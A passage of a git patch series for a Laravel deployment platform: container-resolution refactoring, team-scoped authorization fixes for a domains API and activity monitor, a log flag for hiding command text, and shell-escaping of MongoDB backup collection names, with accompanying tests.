duplicated code from run_pre_deployment_command() and run_post_deployment_command()
while improving error messaging and test coverage.
---
 app/Jobs/ApplicationDeploymentJob.php         | 153 ++++++++++++------
 ...ploymentCommandContainerResolutionTest.php | 116 +++++++++++++
 2 files changed, 217 insertions(+), 52 deletions(-)
 create mode 100644 tests/Feature/DeploymentCommandContainerResolutionTest.php

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index 9d927d10c..c4121ba16 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -3989,6 +3989,51 @@ private function validateContainerName(string $value): string
         return $value;
     }
 
+    /**
+     * Resolve which container to execute a deployment command in.
+     *
+     * For single-container apps, returns the sole container.
+     * For multi-container apps, matches by the user-specified container name.
+     * If no container name is specified for multi-container apps, logs available containers and returns null.
+     */
+    private function resolveCommandContainer(Collection $containers, ?string $specifiedContainerName, string $commandType): ?array
+    {
+        if ($containers->count() === 0) {
+            return null;
+        }
+
+        if ($containers->count() === 1) {
+            return $containers->first();
+        }
+
+        // Multi-container: require a container name to be specified
+        if (empty($specifiedContainerName)) {
+            $available = $containers->map(fn ($c) => data_get($c, 'Names'))->implode(', ');
+            $this->application_deployment_queue->addLogEntry(
+                "{$commandType} command: Multiple containers found but no container name specified. Available: {$available}"
+            );
+
+            return null;
+        }
+
+        // Multi-container: match by specified name prefix
+        $prefix = $specifiedContainerName.'-'.$this->application->uuid;
+        foreach ($containers as $container) {
+            $containerName = data_get($container, 'Names');
+            if (str_starts_with($containerName, $prefix)) {
+                return $container;
+            }
+        }
+
+        // No match found — log available containers to help the user debug
+        $available = $containers->map(fn ($c) => data_get($c, 'Names'))->implode(', ');
+        $this->application_deployment_queue->addLogEntry(
+            "{$commandType} command: Container '{$specifiedContainerName}' not found. Available: {$available}"
+        );
+
+        return null;
+    }
+
     private function run_pre_deployment_command()
     {
         if (empty($this->application->pre_deployment_command)) {
@@ -3996,36 +4041,36 @@ private function run_pre_deployment_command()
         }
         $containers = getCurrentApplicationContainerStatus($this->server, $this->application->id, $this->pull_request_id);
         if ($containers->count() == 0) {
+            $this->application_deployment_queue->addLogEntry('Pre-deployment command: No running containers found. Skipping.');
+
             return;
         }
         $this->application_deployment_queue->addLogEntry('Executing pre-deployment command (see debug log for output/errors).');
 
-        foreach ($containers as $container) {
-            $containerName = data_get($container, 'Names');
-            if ($containerName) {
-                $this->validateContainerName($containerName);
-            }
-            if ($containers->count() == 1 || str_starts_with($containerName, $this->application->pre_deployment_command_container.'-'.$this->application->uuid)) {
-                // Security: pre_deployment_command is intentionally treated as arbitrary shell input.
-                // Users (team members with deployment access) need full shell flexibility to run commands
-                // like "php artisan migrate", "npm run build", etc. inside their own application containers.
-                // The trust boundary is at the application/team ownership level — only authenticated team
-                // members can set these commands, and execution is scoped to the application's own container.
-                // The single-quote escaping here prevents breaking out of the sh -c wrapper, but does not
-                // restrict the command itself. Container names are validated separately via validateContainerName().
-                $cmd = "sh -c '".str_replace("'", "'\''", $this->application->pre_deployment_command)."'";
-                $exec = "docker exec {$containerName} {$cmd}";
-                $this->execute_remote_command(
-                    [
-                        'command' => $exec,
-                        'hidden' => true,
-                    ],
-                );
-
-                return;
-            }
+        $container = $this->resolveCommandContainer($containers, $this->application->pre_deployment_command_container, 'Pre-deployment');
+        if ($container === null) {
+            throw new DeploymentException('Pre-deployment command: Could not find a valid container. Is the container name correct?');
         }
-        throw new DeploymentException('Pre-deployment command: Could not find a valid container. Is the container name correct?');
+
+        $containerName = data_get($container, 'Names');
+        if ($containerName) {
+            $this->validateContainerName($containerName);
+        }
+        // Security: pre_deployment_command is intentionally treated as arbitrary shell input.
+        // Users (team members with deployment access) need full shell flexibility to run commands
+        // like "php artisan migrate", "npm run build", etc. inside their own application containers.
+        // The trust boundary is at the application/team ownership level — only authenticated team
+        // members can set these commands, and execution is scoped to the application's own container.
+        // The single-quote escaping here prevents breaking out of the sh -c wrapper, but does not
+        // restrict the command itself. Container names are validated separately via validateContainerName().
+        $cmd = "sh -c '".str_replace("'", "'\''", $this->application->pre_deployment_command)."'";
+        $exec = "docker exec {$containerName} {$cmd}";
+        $this->execute_remote_command(
+            [
+                'command' => $exec,
+                'hidden' => true,
+            ],
+        );
     }
 
     private function run_post_deployment_command()
@@ -4037,36 +4082,40 @@ private function run_post_deployment_command()
         $this->application_deployment_queue->addLogEntry('Executing post-deployment command (see debug log for output).');
 
         $containers = getCurrentApplicationContainerStatus($this->server, $this->application->id, $this->pull_request_id);
-        foreach ($containers as $container) {
-            $containerName = data_get($container, 'Names');
-            if ($containerName) {
-                $this->validateContainerName($containerName);
-            }
-            if ($containers->count() == 1 || str_starts_with($containerName, $this->application->post_deployment_command_container.'-'.$this->application->uuid)) {
-                // Security: post_deployment_command is intentionally treated as arbitrary shell input.
-                // See the equivalent comment in run_pre_deployment_command() for the full security rationale.
-                $cmd = "sh -c '".str_replace("'", "'\''", $this->application->post_deployment_command)."'";
-                $exec = "docker exec {$containerName} {$cmd}";
-                try {
-                    $this->execute_remote_command(
-                        [
-                            'command' => $exec,
-                            'hidden' => true,
-                            'save' => 'post-deployment-command-output',
-                        ],
-                    );
-                } catch (Exception $e) {
-                    $post_deployment_command_output = $this->saved_outputs->get('post-deployment-command-output');
-                    if ($post_deployment_command_output) {
-                        $this->application_deployment_queue->addLogEntry('Post-deployment command failed.');
-                        $this->application_deployment_queue->addLogEntry($post_deployment_command_output, 'stderr');
-                    }
-                }
+        if ($containers->count() == 0) {
+            $this->application_deployment_queue->addLogEntry('Post-deployment command: No running containers found. Skipping.');
 
-                return;
+            return;
+        }
+
+        $container = $this->resolveCommandContainer($containers, $this->application->post_deployment_command_container, 'Post-deployment');
+        if ($container === null) {
+            throw new DeploymentException('Post-deployment command: Could not find a valid container. Is the container name correct?');
+        }
+
+        $containerName = data_get($container, 'Names');
+        if ($containerName) {
+            $this->validateContainerName($containerName);
+        }
+        // Security: post_deployment_command is intentionally treated as arbitrary shell input.
+        // See the equivalent comment in run_pre_deployment_command() for the full security rationale.
+        $cmd = "sh -c '".str_replace("'", "'\''", $this->application->post_deployment_command)."'";
+        $exec = "docker exec {$containerName} {$cmd}";
+        try {
+            $this->execute_remote_command(
+                [
+                    'command' => $exec,
+                    'hidden' => true,
+                    'save' => 'post-deployment-command-output',
+                ],
+            );
+        } catch (Exception $e) {
+            $post_deployment_command_output = $this->saved_outputs->get('post-deployment-command-output');
+            if ($post_deployment_command_output) {
+                $this->application_deployment_queue->addLogEntry('Post-deployment command failed.');
+                $this->application_deployment_queue->addLogEntry($post_deployment_command_output, 'stderr');
             }
         }
-        throw new DeploymentException('Post-deployment command: Could not find a valid container. Is the container name correct?');
     }
 
     /**
diff --git a/tests/Feature/DeploymentCommandContainerResolutionTest.php b/tests/Feature/DeploymentCommandContainerResolutionTest.php
new file mode 100644
index 000000000..c8c9cf1fc
--- /dev/null
+++ b/tests/Feature/DeploymentCommandContainerResolutionTest.php
@@ -0,0 +1,116 @@
+<?php
+
+use App\Jobs\ApplicationDeploymentJob;
+use App\Models\Application;
+use App\Models\ApplicationDeploymentQueue;
+
+function createJobWithProperties(string $uuid): object
+{
+    $ref = new ReflectionClass(ApplicationDeploymentJob::class);
+    $instance = $ref->newInstanceWithoutConstructor();
+
+    $app = Mockery::mock(Application::class)->makePartial();
+    $app->uuid = $uuid;
+
+    $queue = Mockery::mock(ApplicationDeploymentQueue::class)->makePartial();
+    $queue->shouldReceive('addLogEntry')->andReturnNull();
+
+    $appProp = $ref->getProperty('application');
+    $appProp->setAccessible(true);
+    $appProp->setValue($instance, $app);
+
+    $queueProp = $ref->getProperty('application_deployment_queue');
+    $queueProp->setAccessible(true);
+    $queueProp->setValue($instance, $queue);
+
+    return $instance;
+}
+
+function invokeResolve(object $instance, $containers, ?string $specifiedName, string $type): ?array
+{
+    $ref = new ReflectionClass(ApplicationDeploymentJob::class);
+    $method = $ref->getMethod('resolveCommandContainer');
+    $method->setAccessible(true);
+
+    return $method->invoke($instance, $containers, $specifiedName, $type);
+}
+
+describe('resolveCommandContainer', function () {
+    test('returns null when no containers exist', function () {
+        $instance = createJobWithProperties('abc123');
+        $result = invokeResolve($instance, collect([]), 'web', 'Pre-deployment');
+
+        expect($result)->toBeNull();
+    });
+
+    test('returns the sole container when only one exists', function () {
+        $container = ['Names' => 'web-abc123', 'Labels' => ''];
+        $instance = createJobWithProperties('abc123');
+        $result = invokeResolve($instance, collect([$container]), null, 'Pre-deployment');
+
+        expect($result)->toBe($container);
+    });
+
+    test('returns the sole container regardless of specified name when only one exists', function () {
+        $container = ['Names' => 'web-abc123', 'Labels' => ''];
+        $instance = createJobWithProperties('abc123');
+        $result = invokeResolve($instance, collect([$container]), 'wrong-name', 'Pre-deployment');
+
+        expect($result)->toBe($container);
+    });
+
+    test('returns null when no container name specified for multi-container app', function () {
+        $containers = collect([
+            ['Names' => 'web-abc123', 'Labels' => ''],
+            ['Names' => 'worker-abc123', 'Labels' => ''],
+        ]);
+        $instance = createJobWithProperties('abc123');
+        $result = invokeResolve($instance, $containers, null, 'Pre-deployment');
+
+        expect($result)->toBeNull();
+    });
+
+    test('returns null when empty string container name for multi-container app', function () {
+        $containers = collect([
+            ['Names' => 'web-abc123', 'Labels' => ''],
+            ['Names' => 'worker-abc123', 'Labels' => ''],
+        ]);
+        $instance = createJobWithProperties('abc123');
+        $result = invokeResolve($instance, $containers, '', 'Pre-deployment');
+
+        expect($result)->toBeNull();
+    });
+
+    test('matches correct container by specified name in multi-container app', function () {
+        $containers = collect([
+            ['Names' => 'web-abc123', 'Labels' => ''],
+            ['Names' => 'worker-abc123', 'Labels' => ''],
+        ]);
+        $instance = createJobWithProperties('abc123');
+        $result = invokeResolve($instance, $containers, 'worker', 'Pre-deployment');
+
+        expect($result)->toBe(['Names' => 'worker-abc123', 'Labels' => '']);
+    });
+
+    test('returns null when specified container name does not match any container', function () {
+        $containers = collect([
+            ['Names' => 'web-abc123', 'Labels' => ''],
+            ['Names' => 'worker-abc123', 'Labels' => ''],
+        ]);
+        $instance = createJobWithProperties('abc123');
+        $result = invokeResolve($instance, $containers, 'nonexistent', 'Pre-deployment');
+
+        expect($result)->toBeNull();
+    });
+
+    test('matches container with PR suffix', function () {
+        $containers = collect([
+            ['Names' => 'web-abc123-pr-42', 'Labels' => ''],
+            ['Names' => 'worker-abc123-pr-42', 'Labels' => ''],
+        ]);
+        $instance = createJobWithProperties('abc123');
+        $result = invokeResolve($instance, $containers, 'web', 'Pre-deployment');
+
+        expect($result)->toBe(['Names' => 'web-abc123-pr-42', 'Labels' => '']);
+    });
+});

From a94517f452e225046e01c08385d6a7aedf085c7d Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 16:20:53 +0100
Subject: [PATCH 131/213] fix(api): validate server ownership in domains
 endpoint and scope activity lookups

- Add team-scoped server validation to domains_by_server API endpoint
- Filter applications and services to only those on the requested server
- Scope ActivityMonitor activity lookups to the current team
- Fix query param disambiguation (query vs route param) in domains endpoint
- Fix undefined $ip variable in services domain collection

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 .../Controllers/Api/ServersController.php     | 21 ++++--
 app/Livewire/ActivityMonitor.php              | 13 +++-
 .../Feature/ActivityMonitorCrossTeamTest.php  | 67 +++++++++++++++++++
 tests/Feature/DomainsByServerApiTest.php      | 49 +++++++++++++-
 4 files changed, 140 insertions(+), 10 deletions(-)
 create mode 100644 tests/Feature/ActivityMonitorCrossTeamTest.php

diff --git a/app/Http/Controllers/Api/ServersController.php b/app/Http/Controllers/Api/ServersController.php
index da94521a8..2ef95ce8b 100644
--- a/app/Http/Controllers/Api/ServersController.php
+++ b/app/Http/Controllers/Api/ServersController.php
@@ -290,7 +290,11 @@ public function domains_by_server(Request $request)
         if (is_null($teamId)) {
             return invalidTokenResponse();
         }
-        $uuid = $request->get('uuid');
+        $server = ModelsServer::whereTeamId($teamId)->whereUuid($request->uuid)->first();
+        if (is_null($server)) {
+            return response()->json(['message' => 'Server not found.'], 404);
+        }
+        $uuid = $request->query('uuid');
         if ($uuid) {
             $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $uuid)->first();
             if (! $application) {
@@ -301,7 +305,9 @@ public function domains_by_server(Request $request)
         }
         $projects = Project::where('team_id', $teamId)->get();
         $domains = collect();
-        $applications = $projects->pluck('applications')->flatten();
+        $applications = $projects->pluck('applications')->flatten()->filter(function ($application) use ($server) {
+            return $application->destination?->server?->id === $server->id;
+        });
         $settings = instanceSettings();
         if ($applications->count() > 0) {
             foreach ($applications as $application) {
@@ -341,7 +347,9 @@ public function domains_by_server(Request $request)
                 }
             }
         }
-        $services = $projects->pluck('services')->flatten();
+        $services = $projects->pluck('services')->flatten()->filter(function ($service) use ($server) {
+            return $service->server_id === $server->id;
+        });
         if ($services->count() > 0) {
             foreach ($services as $service) {
                 $service_applications = $service->applications;
@@ -354,7 +362,8 @@ public function domains_by_server(Request $request)
                         })->filter(function (Stringable $fqdn) {
                             return $fqdn->isNotEmpty();
                         });
-                        if ($ip === 'host.docker.internal') {
+                        $serviceIp = $server->ip;
+                        if ($serviceIp === 'host.docker.internal') {
                             if ($settings->public_ipv4) {
                                 $domains->push([
                                     'domain' => $fqdn,
@@ -370,13 +379,13 @@ public function domains_by_server(Request $request)
                             if (! $settings->public_ipv4 && ! $settings->public_ipv6) {
                                 $domains->push([
                                     'domain' => $fqdn,
-                                    'ip' => $ip,
+                                    'ip' => $serviceIp,
                                 ]);
                             }
                         } else {
                             $domains->push([
                                 'domain' => $fqdn,
-                                'ip' => $ip,
+                                'ip' => $serviceIp,
                             ]);
                         }
                     }
diff --git a/app/Livewire/ActivityMonitor.php b/app/Livewire/ActivityMonitor.php
index 370ff1eaa..85ba60c33 100644
--- a/app/Livewire/ActivityMonitor.php
+++ b/app/Livewire/ActivityMonitor.php
@@ -55,7 +55,18 @@ public function hydrateActivity()
             return;
         }
 
-        $this->activity = Activity::find($this->activityId);
+        $activity = Activity::find($this->activityId);
+
+        if ($activity) {
+            $teamId = data_get($activity, 'properties.team_id');
+            if ($teamId && $teamId !== currentTeam()?->id) {
+                $this->activity = null;
+
+                return;
+            }
+        }
+
+        $this->activity = $activity;
     }
 
     public function updatedActivityId($value)
diff --git a/tests/Feature/ActivityMonitorCrossTeamTest.php b/tests/Feature/ActivityMonitorCrossTeamTest.php
new file mode 100644
index 000000000..7e4aebc2f
--- /dev/null
+++ b/tests/Feature/ActivityMonitorCrossTeamTest.php
@@ -0,0 +1,67 @@
+<?php
+
+use App\Livewire\ActivityMonitor;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Livewire\Livewire;
+use Spatie\Activitylog\Models\Activity;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+
+    $this->otherTeam = Team::factory()->create();
+});
+
+test('hydrateActivity blocks access to another teams activity', function () {
+    $otherActivity = Activity::create([
+        'log_name' => 'default',
+        'description' => 'test activity',
+        'properties' => ['team_id' => $this->otherTeam->id],
+    ]);
+
+    $this->actingAs($this->user);
+    session(['currentTeam' => ['id' => $this->team->id]]);
+
+    $component = Livewire::test(ActivityMonitor::class)
+        ->set('activityId', $otherActivity->id)
+        ->assertSet('activity', null);
+});
+
+test('hydrateActivity allows access to own teams activity', function () {
+    $ownActivity = Activity::create([
+        'log_name' => 'default',
+        'description' => 'test activity',
+        'properties' => ['team_id' => $this->team->id],
+    ]);
+
+    $this->actingAs($this->user);
+    session(['currentTeam' => ['id' => $this->team->id]]);
+
+    $component = Livewire::test(ActivityMonitor::class)
+        ->set('activityId', $ownActivity->id);
+
+    expect($component->get('activity'))->not->toBeNull();
+    expect($component->get('activity')->id)->toBe($ownActivity->id);
+});
+
+test('hydrateActivity allows access to activity without team_id in properties', function () {
+    $legacyActivity = Activity::create([
+        'log_name' => 'default',
+        'description' => 'legacy activity',
+        'properties' => [],
+    ]);
+
+    $this->actingAs($this->user);
+    session(['currentTeam' => ['id' => $this->team->id]]);
+
+    $component = Livewire::test(ActivityMonitor::class)
+        ->set('activityId', $legacyActivity->id);
+
+    expect($component->get('activity'))->not->toBeNull();
+    expect($component->get('activity')->id)->toBe($legacyActivity->id);
+});
diff --git a/tests/Feature/DomainsByServerApiTest.php b/tests/Feature/DomainsByServerApiTest.php
index 1e799bec5..ea799275b 100644
--- a/tests/Feature/DomainsByServerApiTest.php
+++ b/tests/Feature/DomainsByServerApiTest.php
@@ -16,11 +16,12 @@
     $this->user = User::factory()->create();
     $this->team->members()->attach($this->user->id, ['role' => 'owner']);
 
-    $this->token = $this->user->createToken('test-token', ['*'], $this->team->id);
+    session(['currentTeam' => $this->team]);
+    $this->token = $this->user->createToken('test-token', ['*']);
     $this->bearerToken = $this->token->plainTextToken;
 
     $this->server = Server::factory()->create(['team_id' => $this->team->id]);
-    $this->destination = StandaloneDocker::factory()->create(['server_id' => $this->server->id]);
+    $this->destination = StandaloneDocker::where('server_id', $this->server->id)->first();
     $this->project = Project::factory()->create(['team_id' => $this->team->id]);
     $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
 });
@@ -53,7 +54,7 @@ function authHeaders(): array
     $otherTeam->members()->attach($otherUser->id, ['role' => 'owner']);
 
     $otherServer = Server::factory()->create(['team_id' => $otherTeam->id]);
-    $otherDestination = StandaloneDocker::factory()->create(['server_id' => $otherServer->id]);
+    $otherDestination = StandaloneDocker::where('server_id', $otherServer->id)->first();
     $otherProject = Project::factory()->create(['team_id' => $otherTeam->id]);
     $otherEnvironment = Environment::factory()->create(['project_id' => $otherProject->id]);
 
@@ -78,3 +79,45 @@ function authHeaders(): array
     $response->assertNotFound();
     $response->assertJson(['message' => 'Application not found.']);
 });
+
+test('returns 404 when server uuid belongs to another team', function () {
+    $otherTeam = Team::factory()->create();
+    $otherUser = User::factory()->create();
+    $otherTeam->members()->attach($otherUser->id, ['role' => 'owner']);
+
+    $otherServer = Server::factory()->create(['team_id' => $otherTeam->id]);
+
+    $response = $this->withHeaders(authHeaders())
+        ->getJson("/api/v1/servers/{$otherServer->uuid}/domains");
+
+    $response->assertNotFound();
+    $response->assertJson(['message' => 'Server not found.']);
+});
+
+test('only returns domains for applications on the specified server', function () {
+    $application = Application::factory()->create([
+        'fqdn' => 'https://app-on-server.example.com',
+        'environment_id' => $this->environment->id,
+        'destination_id' => $this->destination->id,
+        'destination_type' => $this->destination->getMorphClass(),
+    ]);
+
+    $otherServer = Server::factory()->create(['team_id' => $this->team->id]);
+    $otherDestination = StandaloneDocker::where('server_id', $otherServer->id)->first();
+
+    $applicationOnOtherServer = Application::factory()->create([
+        'fqdn' => 'https://app-on-other-server.example.com',
+        'environment_id' => $this->environment->id,
+        'destination_id' => $otherDestination->id,
+        'destination_type' => $otherDestination->getMorphClass(),
+    ]);
+
+    $response = $this->withHeaders(authHeaders())
+        ->getJson("/api/v1/servers/{$this->server->uuid}/domains");
+
+    $response->assertOk();
+    $responseContent = $response->json();
+    $allDomains = collect($responseContent)->pluck('domains')->flatten()->toArray();
+    expect($allDomains)->toContain('app-on-server.example.com');
+    expect($allDomains)->not->toContain('app-on-other-server.example.com');
+});

From 333cc9589ddc988eb5bdd28dad99e16b81d330c4 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 16:48:49 +0100
Subject: [PATCH 132/213] feat(deployment): add command_hidden flag to hide
 command text in logs

Add support for hiding sensitive command text while preserving output logs.
When command_hidden is true, the command text is set to null in the main log
entry but logged separately to the deployment queue with proper redaction.

- Add command_hidden parameter to execute_remote_command and executeCommandWithProcess
- When enabled, separates command visibility from output visibility
- Fix operator precedence in type ternary expression
---
 app/Jobs/ApplicationDeploymentJob.php | 12 ++++++------
 app/Traits/ExecuteRemoteCommand.php   | 15 ++++++++++-----
 2 files changed, 16 insertions(+), 11 deletions(-)

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index 2af380a45..b39ab4f68 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -783,7 +783,7 @@ private function deploy_docker_compose_buildpack()
 
                 try {
                     $this->execute_remote_command(
-                        [executeInDocker($this->deployment_uuid, "cd {$this->workdir} && {$start_command}"), 'hidden' => true],
+                        [executeInDocker($this->deployment_uuid, "cd {$this->workdir} && {$start_command}"), 'hidden' => false, 'type' => 'stdout', 'command_hidden' => true],
                     );
                 } catch (\RuntimeException $e) {
                     if (str_contains($e->getMessage(), "matching `'") || str_contains($e->getMessage(), 'unexpected EOF')) {
@@ -801,7 +801,7 @@ private function deploy_docker_compose_buildpack()
                 $command .= " --env-file {$server_workdir}/.env";
                 $command .= " --project-directory {$server_workdir} -f {$server_workdir}{$this->docker_compose_location} up -d";
                 $this->execute_remote_command(
-                    ['command' => $command, 'hidden' => true],
+                    ['command' => $command, 'hidden' => false, 'type' => 'stdout', 'command_hidden' => true],
                 );
             }
         } else {
@@ -818,11 +818,11 @@ private function deploy_docker_compose_buildpack()
                 $this->write_deployment_configurations();
                 if ($this->preserveRepository) {
                     $this->execute_remote_command(
-                        ['command' => "cd {$server_workdir} && {$start_command}", 'hidden' => true],
+                        ['command' => "cd {$server_workdir} && {$start_command}", 'hidden' => false, 'type' => 'stdout', 'command_hidden' => true],
                     );
                 } else {
                     $this->execute_remote_command(
-                        [executeInDocker($this->deployment_uuid, "cd {$this->basedir} && {$start_command}"), 'hidden' => true],
+                        [executeInDocker($this->deployment_uuid, "cd {$this->basedir} && {$start_command}"), 'hidden' => false, 'type' => 'stdout', 'command_hidden' => true],
                     );
                 }
             } else {
@@ -834,14 +834,14 @@ private function deploy_docker_compose_buildpack()
                     $this->write_deployment_configurations();
 
                     $this->execute_remote_command(
-                        ['command' => $command, 'hidden' => true],
+                        ['command' => $command, 'hidden' => false, 'type' => 'stdout', 'command_hidden' => true],
                     );
                 } else {
                     // Always use .env file
                     $command .= " --env-file {$this->workdir}/.env";
                     $command .= " --project-name {$this->application->uuid} --project-directory {$this->workdir} -f {$this->workdir}{$this->docker_compose_location} up -d";
                     $this->execute_remote_command(
-                        [executeInDocker($this->deployment_uuid, $command), 'hidden' => true],
+                        [executeInDocker($this->deployment_uuid, $command), 'hidden' => false, 'type' => 'stdout', 'command_hidden' => true],
                     );
                     $this->write_deployment_configurations();
                 }
diff --git a/app/Traits/ExecuteRemoteCommand.php b/app/Traits/ExecuteRemoteCommand.php
index 72e0adde8..bb252148a 100644
--- a/app/Traits/ExecuteRemoteCommand.php
+++ b/app/Traits/ExecuteRemoteCommand.php
@@ -78,6 +78,7 @@ public function execute_remote_command(...$commands)
             $customType = data_get($single_command, 'type');
             $ignore_errors = data_get($single_command, 'ignore_errors', false);
             $append = data_get($single_command, 'append', true);
+            $command_hidden = data_get($single_command, 'command_hidden', false);
             $this->save = data_get($single_command, 'save');
             if ($this->server->isNonRoot()) {
                 if (str($command)->startsWith('docker exec')) {
@@ -102,7 +103,7 @@ public function execute_remote_command(...$commands)
 
             while ($attempt < $maxRetries && ! $commandExecuted) {
                 try {
-                    $this->executeCommandWithProcess($command, $hidden, $customType, $append, $ignore_errors);
+                    $this->executeCommandWithProcess($command, $hidden, $customType, $append, $ignore_errors, $command_hidden);
                     $commandExecuted = true;
                 } catch (\RuntimeException|DeploymentException $e) {
                     $lastError = $e;
@@ -152,10 +153,14 @@ public function execute_remote_command(...$commands)
     /**
      * Execute the actual command with process handling
      */
-    private function executeCommandWithProcess($command, $hidden, $customType, $append, $ignore_errors)
+    private function executeCommandWithProcess($command, $hidden, $customType, $append, $ignore_errors, $command_hidden = false)
     {
+        if ($command_hidden && isset($this->application_deployment_queue)) {
+            $this->application_deployment_queue->addLogEntry('[CMD]: '.$this->redact_sensitive_info($command), hidden: true);
+        }
+
         $remote_command = SshMultiplexingHelper::generateSshCommand($this->server, $command);
-        $process = Process::timeout(config('constants.ssh.command_timeout'))->idleTimeout(3600)->start($remote_command, function (string $type, string $output) use ($command, $hidden, $customType, $append) {
+        $process = Process::timeout(config('constants.ssh.command_timeout'))->idleTimeout(3600)->start($remote_command, function (string $type, string $output) use ($command, $hidden, $customType, $append, $command_hidden) {
             $output = str($output)->trim();
             if ($output->startsWith('╔')) {
                 $output = "\n".$output;
@@ -165,9 +170,9 @@ private function executeCommandWithProcess($command, $hidden, $customType, $appe
             $sanitized_output = sanitize_utf8_text($output);
 
             $new_log_entry = [
-                'command' => $this->redact_sensitive_info($command),
+                'command' => $command_hidden ? null : $this->redact_sensitive_info($command),
                 'output' => $this->redact_sensitive_info($sanitized_output),
-                'type' => $customType ?? $type === 'err' ? 'stderr' : 'stdout',
+                'type' => $customType ?? ($type === 'err' ? 'stderr' : 'stdout'),
                 'timestamp' => Carbon::now('UTC'),
                 'hidden' => $hidden,
                 'batch' => static::$batch_counter,

From 99043600ee881fd8581185e7590604d9882382cd Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 16:52:06 +0100
Subject: [PATCH 133/213] fix(backup): validate MongoDB collection names in
 backup input

Add validateDatabasesBackupInput() helper that properly parses all
database backup formats including MongoDB's "db:col1,col2|db2:col3"
and validates each component individually.

- Validate and escape collection names in DatabaseBackupJob
- Replace comma-only split in BackupEdit with format-aware validation
- Add input validation in API create_backup and update_backup endpoints
- Add unit tests for collection name and multi-format validation

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 .../Controllers/Api/DatabasesController.php   | 24 ++++++++
 app/Jobs/DatabaseBackupJob.php                | 12 +++-
 app/Livewire/Project/Database/BackupEdit.php  | 16 +----
 bootstrap/helpers/shared.php                  | 53 ++++++++++++++++
 tests/Unit/DatabaseBackupSecurityTest.php     | 61 +++++++++++++++++++
 5 files changed, 150 insertions(+), 16 deletions(-)

diff --git a/app/Http/Controllers/Api/DatabasesController.php b/app/Http/Controllers/Api/DatabasesController.php
index 700055fcc..44b66e57e 100644
--- a/app/Http/Controllers/Api/DatabasesController.php
+++ b/app/Http/Controllers/Api/DatabasesController.php
@@ -792,6 +792,18 @@ public function create_backup(Request $request)
             }
         }
 
+        // Validate databases_to_backup input
+        if (! empty($backupData['databases_to_backup'])) {
+            try {
+                validateDatabasesBackupInput($backupData['databases_to_backup']);
+            } catch (\Exception $e) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => ['databases_to_backup' => [$e->getMessage()]],
+                ], 422);
+            }
+        }
+
         // Add required fields
         $backupData['database_id'] = $database->id;
         $backupData['database_type'] = $database->getMorphClass();
@@ -997,6 +1009,18 @@ public function update_backup(Request $request)
             unset($backupData['s3_storage_uuid']);
         }
 
+        // Validate databases_to_backup input
+        if (! empty($backupData['databases_to_backup'])) {
+            try {
+                validateDatabasesBackupInput($backupData['databases_to_backup']);
+            } catch (\Exception $e) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => ['databases_to_backup' => [$e->getMessage()]],
+                ], 422);
+            }
+        }
+
         $backupConfig->update($backupData);
 
         if ($request->backup_now) {
diff --git a/app/Jobs/DatabaseBackupJob.php b/app/Jobs/DatabaseBackupJob.php
index 041d31bad..d86986fad 100644
--- a/app/Jobs/DatabaseBackupJob.php
+++ b/app/Jobs/DatabaseBackupJob.php
@@ -524,10 +524,18 @@ private function backup_standalone_mongodb(string $databaseWithCollections): voi
                         $commands[] = "docker exec $this->container_name mongodump --authenticationDatabase=admin --uri=\"$url\" --db $escapedDatabaseName --gzip --archive > $this->backup_location";
                     }
                 } else {
+                    // Validate and escape each collection name
+                    $escapedCollections = $collectionsToExclude->map(function ($collection) {
+                        $collection = trim($collection);
+                        validateShellSafePath($collection, 'collection name');
+
+                        return escapeshellarg($collection);
+                    });
+
                     if (str($this->database->image)->startsWith('mongo:4')) {
-                        $commands[] = "docker exec $this->container_name mongodump --uri=$url --gzip --excludeCollection ".$collectionsToExclude->implode(' --excludeCollection ')." --archive > $this->backup_location";
+                        $commands[] = "docker exec $this->container_name mongodump --uri=$url --gzip --excludeCollection ".$escapedCollections->implode(' --excludeCollection ')." --archive > $this->backup_location";
                     } else {
-                        $commands[] = "docker exec $this->container_name mongodump --authenticationDatabase=admin --uri=\"$url\" --db $escapedDatabaseName --gzip --excludeCollection ".$collectionsToExclude->implode(' --excludeCollection ')." --archive > $this->backup_location";
+                        $commands[] = "docker exec $this->container_name mongodump --authenticationDatabase=admin --uri=\"$url\" --db $escapedDatabaseName --gzip --excludeCollection ".$escapedCollections->implode(' --excludeCollection ')." --archive > $this->backup_location";
                     }
                 }
             }
diff --git a/app/Livewire/Project/Database/BackupEdit.php b/app/Livewire/Project/Database/BackupEdit.php
index c24e2a3f1..0fff2bd03 100644
--- a/app/Livewire/Project/Database/BackupEdit.php
+++ b/app/Livewire/Project/Database/BackupEdit.php
@@ -105,21 +105,9 @@ public function syncData(bool $toModel = false)
             $this->backup->s3_storage_id = $this->s3StorageId;
 
             // Validate databases_to_backup to prevent command injection
+            // Handles all formats including MongoDB's "db:col1,col2|db2:col3"
             if (filled($this->databasesToBackup)) {
-                $databases = str($this->databasesToBackup)->explode(',');
-                foreach ($databases as $index => $db) {
-                    $dbName = trim($db);
-                    try {
-                        validateShellSafePath($dbName, 'database name');
-                    } catch (\Exception $e) {
-                        // Provide specific error message indicating which database failed validation
-                        $position = $index + 1;
-                        throw new \Exception(
